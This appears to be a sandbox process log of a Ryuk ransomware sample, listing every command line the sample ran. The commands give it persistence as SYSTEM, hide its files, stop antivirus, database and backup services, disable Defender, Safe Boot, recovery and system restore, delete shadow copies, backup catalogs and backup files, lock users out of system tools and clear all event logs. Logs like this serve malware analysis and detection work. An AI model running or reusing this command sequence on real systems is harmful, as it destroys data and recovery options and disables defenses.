C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe

"C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\SysWOW64\attrib.exe

attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe" /RU SYSTEM /RL HIGHEST /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe" /RU SYSTEM /RL HIGHEST /F

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe" /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe" /F

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe

C:\Windows\SysWOW64\attrib.exe

attrib +h +s ryuk.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe

C:\Windows\SysWOW64\attrib.exe

attrib +h +s C:\ProgramData\ryuk.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /t /f /im sql*

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /t /im veeam*

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\taskkill.exe

taskkill /t /f /im sql*

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog1

C:\Windows\SysWOW64\icacls.exe

icacls * /grant Everyone:(OI)(CI)F /T /C /Q

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\SysWOW64\reg.exe

reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\SysWOW64\reg.exe

reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c "C:\ProgramData\RyukReadMe.txt " && exit

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c "C:\ProgramData\RyukReadMe.txt "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c vssadmin Delete Shadows /All /Quiet

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin Delete Shadows /All /Quiet

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c wmic shadowcopy delete

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c wbadmin delete catalog -quiet/

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c bcdedit /set {default} recoveryenabled no

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} recoveryenabled no

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c wmic shadowcopy delete

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c wbadmin delete catalog -quiet/

C:\Windows\SysWOW64\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\ProgramData\RyukReadMe.txt

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c net stop avpsus /y

C:\Windows\SysWOW64\net.exe

net stop avpsus /y

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\SysWOW64\vssadmin.exe

vssadmin Delete Shadows /All /Quiet

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop avpsus /y

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c net stop McAfeeDLPAgentService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop McAfeeDLPAgentService /y

C:\Windows\SysWOW64\net.exe

net stop McAfeeDLPAgentService /y

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c net stop mfewc /y

C:\Windows\SysWOW64\net.exe

net stop mfewc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop mfewc /y

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c net stop BMR Boot Service /y

C:\Windows\SysWOW64\net.exe

net stop BMR Boot Service /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop BMR Boot Service /y

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c net stop NetBackup BMR MTFTP Service /y

C:\Windows\SysWOW64\net.exe

net stop NetBackup BMR MTFTP Service /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY start=disabled

C:\Windows\SysWOW64\sc.exe

sc config SQLTELEMETRY start=disabled

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY$ECWDB2 start= disabled

C:\Windows\SysWOW64\sc.exe

sc config SQLTELEMETRY$ECWDB2 start= disabled

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc config SQLWriter start= disabled

C:\Windows\SysWOW64\sc.exe

sc config SQLWriter start= disabled

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc config SstpSvc start= disabled

C:\Windows\SysWOW64\sc.exe

sc config SstpSvc start= disabled

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /IM mspub.exe /F

C:\Windows\SysWOW64\taskkill.exe

taskkill /IM mspub.exe /F

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /IM mydesktopqos.exe /F

C:\Windows\SysWOW64\taskkill.exe

taskkill /IM mydesktopqos.exe /F

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /IM mydesktopservice.exe /F

C:\Windows\SysWOW64\taskkill.exe

taskkill /IM mydesktopservice.exe /F

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet

C:\Windows\SysWOW64\vssadmin.exe

vssadmin Delete Shadows /all /quiet

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet

C:\Windows\SysWOW64\vssadmin.exe

vssadmin Delete Shadows /all /quiet

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q c:*.bac c:*.bak c:*.wbcat c:*.bkf c:Backup*.* c:ackup*.* c:*.set c:*.win

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q d:*.bac d:*.bak d:*.wbcat d:*.bkf d:Backup*.* d:ackup*.* d:*.set d:*.win

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q e:*.bac e:*.bak e:*.wbcat e:*.bkf e:Backup*.* e:ackup*.* e:*.set e:*.win

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q f:*.bac f:*.bak f:*.wbcat f:*.bkf f:Backup*.* f:ackup*.* f:*.set f:*.win

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q g:*.bac g:*.bak g:*.wbcat g:*.bkf g:Backup*.* g:ackup*.* g:*.set g:*.win

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q h:*.bac h:*.bak h:*.wbcat h:*.bkf h:Backup*.* h:ackup*.* h:*.set h:*.win

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c del %0

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s hrmlog2

C:\Windows\SysWOW64\attrib.exe

attrib +h +s hrmlog2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\hrmlog2

C:\Windows\SysWOW64\attrib.exe

attrib +h +s C:\ProgramData\hrmlog2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c for /F "tokens=*" %s in ('wevtutil.exe el') DO wevtutil.exe cl "%s"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c wevtutil.exe el

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe el

C:\Windows\SysWOW64\wevtutil.exe

